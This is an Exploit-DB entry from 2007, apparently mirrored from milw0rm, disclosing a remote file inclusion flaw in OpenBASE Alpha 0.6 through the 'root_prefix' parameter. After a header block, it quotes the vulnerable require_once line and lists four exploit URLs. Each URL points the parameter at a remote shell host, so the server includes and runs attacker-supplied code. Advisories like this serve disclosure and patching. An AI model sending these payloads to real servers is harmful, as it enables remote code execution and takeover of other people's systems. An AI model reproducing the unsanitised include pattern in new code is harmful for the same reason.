OpenBASE 0.6a - 'root_prefix' Remote File Inclusion

Author: DeltahackingTEAM
type: webapps
platform: php
port: 
date_added: 2007-05-24  
date_updated: 2016-10-05  
verified: 1  
codes: OSVDB-38048;CVE-2007-2947;OSVDB-38047;OSVDB-38046;OSVDB-38045  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comopenbase_alpha_0_6.zip  

raw file: 3991.txt  
**********************************************************************************************************
                                              DeltaSecurityTEAM
                                              WwW.DeltaSecurity.iR
**********************************************************************************************************
* Portal Name = OpenBASE Alpha 0.6
* Class = Remote File Inclusion
* Risk = High (Remote File Execution)
* Download = Http://openbase.sourceforge.net
* Discoverd By = DeltahackingTEAM
* User In Delta Team = Dav00d_Cracker
* Conatact = Davood_cracker@Yahoo.com
--------------------------------------------------------------------------------------------
Vulnerability C0de :
Require_once($root_prefix . "nav.php");
--------------------------------------------------------------------------------------------
- Expl0it:
Http://localhost/[PATH]/index.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/email_subscribe.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/download.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/development.php?root_prefix=http://Shellz?
--------------------------------------------------------------------------------------------
Gr33tz : Dr.Trojan , Hiv++ , D_7j , L0rd , RezaYavari , Vpc , all IRANIAN Hackers , and all Enemy
**********************************************************************************************************

# milw0rm.com [2007-05-25]